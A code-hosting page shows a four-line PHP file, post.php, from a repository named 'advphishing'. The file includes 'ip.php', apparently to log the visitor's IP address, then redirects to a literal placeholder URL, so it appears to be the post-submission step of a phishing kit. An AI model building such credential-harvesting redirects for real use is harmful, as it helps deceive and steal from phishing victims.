Book a Demo!
Store
Features
Docs
Share
Support
News
About
Policies
Sign Up
Sign In
ignitetch
Edit Copy
Star
GitHub Repository:
ignitetch/advphishing
Path:
blob/master/post.php
7
3
5
views
1
<?php
2
include
'ip.php'
;
3
header
(
'Location: https://$1'
)
;
4
exit
5
?>
6
7